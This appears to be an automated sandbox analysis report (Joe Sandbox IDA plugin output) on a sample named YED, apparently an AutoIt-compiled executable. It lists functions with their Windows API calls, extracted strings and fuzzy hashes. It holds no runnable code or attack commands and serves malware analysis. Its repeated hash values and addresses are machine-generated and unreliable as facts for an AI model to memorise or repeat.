Instruction Fuzzy Hash: 0E210C75E90354ABDB109F95FC9DAADBFB4FB48B50F1000AAE500AA6A0D7B11560CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0021B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0021BB4E

Strings

p#., xrefs: 0026024F
x#., xrefs: 00260168
p#., xrefs: 0021BA72
p#., xrefs: 0021BB6B
p%., xrefs: 0021BB32
p#., xrefs: 00260263
p%., xrefs: 0021B8DC
x#., xrefs: 00260207

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#.$p#.$p#.$p#.$p%.$p%.$x#.$x#.
API String ID: 1385522511-553131232
Opcode ID: 37ca03392d2676557315c7d4a766524b77f5009a6d2b4e93db6745e9796e31d7
Instruction ID: 9c2eced1087439aa04d1dcf425edf01286cea40e6f6c3352e78354fa2a5873a7
Opcode Fuzzy Hash: 37ca03392d2676557315c7d4a766524b77f5009a6d2b4e93db6745e9796e31d7
Instruction Fuzzy Hash: 8C32CF34A2020ADFDB15CF54C894ABEB7F9EF54304F148099E906AB291C7B4ADE1DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00213170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0021316A,?,?), ref: 002131D8
KillTimer.USER32 ref: 00213204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00213227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0021316A,?,?), ref: 00213232
CreatePopupMenu.USER32 ref: 00213246
PostQuitMessage.USER32 ref: 00213267

Strings

TaskbarCreated, xrefs: 0021322D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5e3ef98de3085ac8729d732491333de7cf840dff26f4cf12707f9bffdc3ac9d9
Instruction ID: 583b74827b2b6ab0e39cb760329395792c70764ff370d0d7a9a71e6593739b5d
Opcode Fuzzy Hash: 5e3ef98de3085ac8729d732491333de7cf840dff26f4cf12707f9bffdc3ac9d9
Instruction Fuzzy Hash: D04118312B0245A7DB15AF78AC4DBF936DAE726340F140135F906852E1CBB19EF49BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%., xrefs: 00262FDA
D%., xrefs: 0026302D
D%., xrefs: 0021E4B1
Variable must be of type 'Object'., xrefs: 002632B7
D%.D%., xrefs: 0021E27E
D%., xrefs: 0021E1E0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: D%.$D%.$D%.$D%.$D%.D%.$Variable must be of type 'Object'.
API String ID: 0-516259185
Opcode ID: 890a40a0cb94bed08933b566cbab7a249aaf077ff7b0324cdb6855212708fb69
Instruction ID: 0277919ffbe1eb00db7207ea12a99654a97a59d9d218416e877d2800cdeefa62
Opcode Fuzzy Hash: 890a40a0cb94bed08933b566cbab7a249aaf077ff7b0324cdb6855212708fb69
Instruction Fuzzy Hash: 65C27D71A20215DFCF14CF58D880AADB7F1BF28310F258169ED16AB291D375EDA1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00212C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00212C91
CreateWindowExW.USER32 ref: 00212CB2
ShowWindow.USER32(00000000), ref: 00212CC6
ShowWindow.USER32(00000000), ref: 00212CCF

Strings

AutoIt v3, xrefs: 00212C89, 00212C8E, 00212C8F
edit, xrefs: 00212CAC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: be5c15d4343972d6f7f5d2a026ab279b493098584cd8e405c86a37ed04497b8a
Instruction ID: 0515c94cba2769057f4efad9c8dae9e3b6ff773fb6c8cca9fae3f403127e53d2
Opcode Fuzzy Hash: be5c15d4343972d6f7f5d2a026ab279b493098584cd8e405c86a37ed04497b8a
Instruction Fuzzy Hash: 31F0DA755802D07BEB311717BC8CE776FBDD7C7F50B1000AAF900AA5A0C6711861DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 002461FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002382D9,002382D9,?,?,?,0024644F,00000001,00000001,8BE85006), ref: 00246258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0024644F,00000001,00000001,8BE85006,?,?,?), ref: 002462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002463D8
__freea.LIBCMT ref: 002463E5

Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852

__freea.LIBCMT ref: 002463EE
__freea.LIBCMT ref: 00246413

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 9450f27ce63f3679c390409332ff2917e15a84c09e50c278c78fcd6b9f95a93a
Instruction ID: 2ce221695e6dd40d9fd67c67914a89e615e6e5cf85851ff9874241b5d35e8d8a
Opcode Fuzzy Hash: 9450f27ce63f3679c390409332ff2917e15a84c09e50c278c78fcd6b9f95a93a
Instruction Fuzzy Hash: E4513772620207ABDB2D8FA0CC89EAF7BA9EF46B10F144269FC05D6140DB74DC60CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00282947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282C05
DeleteFileW.KERNEL32(?), ref: 00282C87
CopyFileW.KERNEL32 ref: 00282C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282CC0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: f4c54a059ed786ef46f47e1ac6e71b06789d3549ef798685e22137fa6fe69a7d
Instruction ID: e47a6aa49e7a5a916af32d1ccc4aabd7bc380b7c01c29b7b6053d96f05de4d0e
Opcode Fuzzy Hash: f4c54a059ed786ef46f47e1ac6e71b06789d3549ef798685e22137fa6fe69a7d
Instruction Fuzzy Hash: AFB170B1D21129EBDF15EFA4CC85EDEB7BDEF49310F1040A6F509E6181EA319A588F60

Uniqueness

Uniqueness Score: -1.00%

Function 00245AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JO!, xrefs: 00245BA8, 00245C6C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: JO!
API String ID: 0-3116667536
Opcode ID: 3d874f82bf57cb7cebc9cac489df768c0afe6e47bcfc19f2088db2f10080f813
Instruction ID: 3416695e58f034b95e0c1adc1dada47f00f231f83e3bddcc9f56afcb170b3322
Opcode Fuzzy Hash: 3d874f82bf57cb7cebc9cac489df768c0afe6e47bcfc19f2088db2f10080f813
Instruction Fuzzy Hash: 4151E4B1D3062ADFCB189FA4D985FAEBBB4EF05314F14005AF445AB293D6708921CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00213B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00213B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00213B61
RegCloseKey.ADVAPI32(00000000), ref: 00213B83

Strings

Control Panel\Mouse, xrefs: 00213B3E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fc28918cf4dbf8bcebf709989fae1f49deb6b7d1613504cbcce4a49d33dfd76a
Instruction ID: 63d65937bec4ac696d65e6d35c5ce4df387746fdf52b08e9acf0c0de9932a7ee
Opcode Fuzzy Hash: fc28918cf4dbf8bcebf709989fae1f49deb6b7d1613504cbcce4a49d33dfd76a
Instruction Fuzzy Hash: 04115AB1524209FFDB20CFA4DC48AEFB7F9EF11748B104469A805D7210E6319F949760

Uniqueness

Uniqueness Score: -1.00%

Function 00243073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002113C6,00000000,00000000,?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue), ref: 002430A5
GetLastError.KERNEL32(?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000,00000364,?,00242E46), ref: 002430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000), ref: 002430BF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ba8931e33bb0e0d6941f9da7ca84bff0acbd3ed674a8fb31a22c130d2a2efae0
Instruction ID: fe55c722081547982f167a622ca8031f10c3714c1f4c8e0f611ff8b47e6c714c
Opcode Fuzzy Hash: ba8931e33bb0e0d6941f9da7ca84bff0acbd3ed674a8fb31a22c130d2a2efae0
Instruction Fuzzy Hash: 3001F732331223ABCB35CF78AC88A577BD8AF46B61B200720F905E7140CB21D925C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00212DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00252C8C

Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2

Part of subcall function 00212DA5: GetLongPathNameW.KERNEL32 ref: 00212DC4

Strings

`e-, xrefs: 00252C85
X, xrefs: 00252C5A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e-
API String ID: 779396738-4103291849
Opcode ID: 54abb68aaba519649c14ae3e3b646b693d2128993dc2e226e9098f71448a8f32
Instruction ID: 1e07cd88ba7b0adc5977d5da939ede8118732a9a7b16b4c745f60f474521c986
Opcode Fuzzy Hash: 54abb68aaba519649c14ae3e3b646b693d2128993dc2e226e9098f71448a8f32
Instruction Fuzzy Hash: 0A21D570A20298DFCB01EF94D849BEE7BF8AF59305F00405AE405B7241DBB49AAD8F61

Uniqueness

Uniqueness Score: -1.00%

Function 0022FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00230668

Part of subcall function 002332A4: RaiseException.KERNEL32(?,?,?,0023068A,?,002E1444,?,?,?,?,?,?,0023068A,00211129,002D8738,00211129), ref: 00233304

__CxxThrowException@8.LIBVCRUNTIME ref: 00230685

Strings

Unknown exception, xrefs: 00230692

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 73a0be61fc2b5bd5e46f34f5d6482102259d74231b1c0bd304565f8f71f13e80
Instruction ID: 3ffd39be4ae7ac3ef376eca598717b9e55711b0b404cca2784b28193419f5991
Opcode Fuzzy Hash: 73a0be61fc2b5bd5e46f34f5d6482102259d74231b1c0bd304565f8f71f13e80
Instruction Fuzzy Hash: F7F0AFA492020E77CB00BAA4E896C9E777C6E01310FA04571B92496595EF71EA758D90

Uniqueness

Uniqueness Score: -1.00%

Function 00283017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0028302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00283044

Strings

aut, xrefs: 00283038

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d8bf7a411720b6a0e60e7731bad573479d762e88bdbc6a8ad5c3434be97d8242
Instruction ID: dc14ae46a32994df9cbb2a79cf3e77575cda35fbcc5de6cebf33a46ba1a079be
Opcode Fuzzy Hash: d8bf7a411720b6a0e60e7731bad573479d762e88bdbc6a8ad5c3434be97d8242
Instruction Fuzzy Hash: 4FD05E7250032867DA20A7A4AD0EFCB3B6CDB06750F0002A2BA96E2091DEB09984CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00297F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002982F5
TerminateProcess.KERNEL32(00000000), ref: 002982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002984DD

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 2f04d24c8b74988fa7506a8b710aa6bb53ca4ba6bd56a8fff9e39b495ac3f696
Instruction ID: cbf05c7bc0ead59aee23163524c90436a9602a7132c507a9627497189e0e9d07
Opcode Fuzzy Hash: 2f04d24c8b74988fa7506a8b710aa6bb53ca4ba6bd56a8fff9e39b495ac3f696
Instruction Fuzzy Hash: C3127C71A183419FCB14DF28C484B6ABBE5FF85314F18895DE8898B252CB31ED55CF92

Uniqueness

Uniqueness Score: -1.00%

Function 002110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00211BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00211BF4
Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00211BFC
Part of subcall function 00211BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00211C07
Part of subcall function 00211BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00211C12
Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00211C1A
Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00211C22

Part of subcall function 00211B4A: RegisterWindowMessageW.USER32(00000004,?,002112C4), ref: 00211BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0021136A
OleInitialize.OLE32 ref: 00211388
CloseHandle.KERNEL32(00000000), ref: 002524AB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 0b1072b72360fd280b93e5165dc7eff89359d6b0e145d17b735b9dfac472880c
Instruction ID: 72f124cb969b68c8d878e80284faf51f5e7100ccc51fa12bdbbbb25446a5c5fe
Opcode Fuzzy Hash: 0b1072b72360fd280b93e5165dc7eff89359d6b0e145d17b735b9dfac472880c
Instruction Fuzzy Hash: 2F7180B49A13C18FD784DF7AB9C96A93AE4FB99344394413AD40ACB3A1EB3044B5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002154C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001), ref: 0021556D
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 0021557D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: cd628c3ad2d990bee5eb8730a6e11642409526534c632a4e35e027934595a3ad
Instruction ID: 06ec8731183b494c749906c1f49d1b19e5c2b002adf054c42e345debf5706f4c
Opcode Fuzzy Hash: cd628c3ad2d990bee5eb8730a6e11642409526534c632a4e35e027934595a3ad
Instruction Fuzzy Hash: 1F314D71A1061AFFDB14CF28C880B99B7F6FB54314F148269E91597240D771FDA4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 00248704
GetLastError.KERNEL32(?,002485CC,?,002D8CC8,0000000C), ref: 0024870E
__dosmaperr.LIBCMT ref: 00248739

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
